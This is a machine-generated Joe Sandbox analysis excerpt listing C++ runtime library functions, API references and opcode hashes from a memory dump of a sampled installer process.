                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2854358121-1377069549
                                                                                                                                                                                                                              • Opcode ID: daeace40536a43b00dea78c365678d5c7d301b441de0435ee2aa6cedf7fd3e05
                                                                                                                                                                                                                              • Instruction ID: 4e809d4eaef10587d54a8271b6c6efb997289383ba7e4df1977afcf50b61c1ae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: daeace40536a43b00dea78c365678d5c7d301b441de0435ee2aa6cedf7fd3e05
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F601C47190051ADBCB14EB6099196BE7FB6BFC4720F240409E6156B2D2CFB89E018791
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005FE96D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005FE974
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005FE97E
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005FE9CF
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005FE9EF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2854358121-1377069549
                                                                                                                                                                                                                              • Opcode ID: d2d1123d243394bd93cb9073e7e2f5328e00cb355aab7e60643b86036618cb21
                                                                                                                                                                                                                              • Instruction ID: 38f77a64fd1ae5e6d32128c548b0d1dfdea0a5a6ce164e32fb74f570c7052429
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d2d1123d243394bd93cb9073e7e2f5328e00cb355aab7e60643b86036618cb21
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1101D63190016ADBCB15EB64E90A6BE7F66BFC0310F240409F6146B3E2CF789E01C7A1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005FEA02 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005FEA09
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005FEA13
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005FEA64
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005FEA84
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2854358121-1377069549
                                                                                                                                                                                                                              • Opcode ID: 879797b851d595c79868223876dcd43ae26e5e431d68f371574d79ec7e39e0e6
                                                                                                                                                                                                                              • Instruction ID: 1311c97a6139d43d3df8b33d9b54b1146ca9261c4e04214cc79a1a369f1bf9eb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 879797b851d595c79868223876dcd43ae26e5e431d68f371574d79ec7e39e0e6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0001C03590012A9BCB15EB60984A6BE7F66BF84710F290409E6456B3E2CF389E01CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005FEBC1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005FEBC8
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005FEBD2
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005FEC23
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005FEC43
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2854358121-1377069549
                                                                                                                                                                                                                              • Opcode ID: 435fe8859c8fecd494e6a0b553a46dda2d013cee91a8dd4f56b603abc9a9d9c6
                                                                                                                                                                                                                              • Instruction ID: 986d865deb66caca70395a9ec7e3479e1ed21166a59abfe3d2699c5ca512ecb4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 435fe8859c8fecd494e6a0b553a46dda2d013cee91a8dd4f56b603abc9a9d9c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C101C43590011ADBCB19EB60980A6BE7F76BFC0710F290409F6156B3D2CF389E018B91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F2BB5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F2BBC
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F2BC6
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F2C17
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F2C37
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2854358121-1377069549
                                                                                                                                                                                                                              • Opcode ID: 2da93f2b301a6353bc90a18a395b3a8b8e759f6e05f4ca1f0163973f5b457400
                                                                                                                                                                                                                              • Instruction ID: a2f2ca683537977ffadeb5fae3dd49d6478cd39f3c9f0744c8b2a48fdfee36ec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2da93f2b301a6353bc90a18a395b3a8b8e759f6e05f4ca1f0163973f5b457400
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3401C07190156EDBCB18EBA4A8096BE7F76BF80310F240409F614AB3D2CF389E01CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005FEC56 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005FEC5D
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005FEC67
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005FECB8
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005FECD8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2854358121-1377069549
                                                                                                                                                                                                                              • Opcode ID: c8a2e0ad6d41b7ecf09b8ef8c198493954af7d3cdf97008ef1ed9f8a731e37de
                                                                                                                                                                                                                              • Instruction ID: 5cba5c8b21f0d299993590330fd064f08b605baf6cd89b24830cd5cd80765434
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8a2e0ad6d41b7ecf09b8ef8c198493954af7d3cdf97008ef1ed9f8a731e37de
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6201C03190012ADBCB15EB64D84AABE7F66BF80320F240409F6156B2D2CF389E01CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F2C4A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F2C51
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F2C5B
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F2CAC
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F2CCC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2854358121-1377069549
                                                                                                                                                                                                                              • Opcode ID: e1037ff9ea90590355c7aca839f283ef5977d84f0beb9afeed935f00a1f074c4
                                                                                                                                                                                                                              • Instruction ID: a1b7b182fb7e7fe5ab9ad49cc66964518fa2e8b2e0f9409546a9ca6101db86ed
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1037ff9ea90590355c7aca839f283ef5977d84f0beb9afeed935f00a1f074c4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7701C07590112ADBCB14EBA498096BE7FA6BFC0710F240409F6196B3D2CF789E018B91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F2CDF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F2CE6
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F2CF0
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F2D41
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F2D61
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2854358121-1377069549
                                                                                                                                                                                                                              • Opcode ID: 6dd7fc7695c2416c69cda892b0d0ea291138a129c69d4f00256e7424baec33d6
                                                                                                                                                                                                                              • Instruction ID: 24edc2f954c74058834275a664aa01760199ea10c6a984a51c58c0e28d3b67ad
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6dd7fc7695c2416c69cda892b0d0ea291138a129c69d4f00256e7424baec33d6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5301C47190011EDBCB15EB6098496BE7F66BF84710F250509F604BB2D2DF789E028B91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F2E09 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F2E10
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F2E1A
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F2E6B
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F2E8B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2854358121-1377069549
                                                                                                                                                                                                                              • Opcode ID: 92b5679263fb0d0256108cdbf71e164a56892bed8462d4f7d70cb2f945088746
                                                                                                                                                                                                                              • Instruction ID: 4aaba5aedacc238cfaa1bdc06c869d8a0f5b12a096be392356415723fd0e170f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92b5679263fb0d0256108cdbf71e164a56892bed8462d4f7d70cb2f945088746
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E01C47590051EDBCB14EB64D809ABE7F66BF94710F240909F6146B3D2CF389E018B91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F2E9E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F2EA5
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F2EAF
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F2F00
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F2F20
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2854358121-1377069549
                                                                                                                                                                                                                              • Opcode ID: 9a86870cada678dc019ab291edf8f7b15b723f29b065f9de6810c2f1dd4a477e
                                                                                                                                                                                                                              • Instruction ID: f8ebd527404f6952b282293eef24e28b4a12625506889d44c4d199848de9fc3c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a86870cada678dc019ab291edf8f7b15b723f29b065f9de6810c2f1dd4a477e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC01C07590052ADBCB15EBA0E80AABE7F76BF80310F250409F6156B2D2CF389E01CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F2F33 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F2F3A
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F2F44
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F2F95
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F2FB5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2854358121-1377069549
                                                                                                                                                                                                                              • Opcode ID: e4765537457d2140b87d8bf2a0216a0dcf16e194d6964eb799283e68d7b8cdc1
                                                                                                                                                                                                                              • Instruction ID: 16c296e179bf9f00b3fda947e33d12797f578d85f499b023225b84b82bb8119c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4765537457d2140b87d8bf2a0216a0dcf16e194d6964eb799283e68d7b8cdc1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D501C47591151ADBCB14EB60980A6BEBF76BFC4710F240409F605AB3D2CF389E018B91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00602D20 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SleepConditionVariableCS.KERNELBASE(?,00602CBD,00000064), ref: 00602D43
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0063DD3C,?,?,00602CBD,00000064,?,?,?,005E23B6,0063E638,FAB1B776,?,?,00623D6D,000000FF), ref: 00602D4D
                                                                                                                                                                                                                              • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00602CBD,00000064,?,?,?,005E23B6,0063E638,FAB1B776,?,?,00623D6D,000000FF), ref: 00602D5E
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0063DD3C,?,00602CBD,00000064,?,?,?,005E23B6,0063E638,FAB1B776,?,?,00623D6D,000000FF), ref: 00602D65
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 3269011525-1377069549
                                                                                                                                                                                                                              • Opcode ID: 3a6118b1ef4f77636f51649a4e0075b00841cba4ee6bbc3d8b0ce065f5a5c9fc
                                                                                                                                                                                                                              • Instruction ID: 1156a50b066591927a1be61c03ea0afc867b5e6e1c22661141672cbc4e436e7e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a6118b1ef4f77636f51649a4e0075b00841cba4ee6bbc3d8b0ce065f5a5c9fc
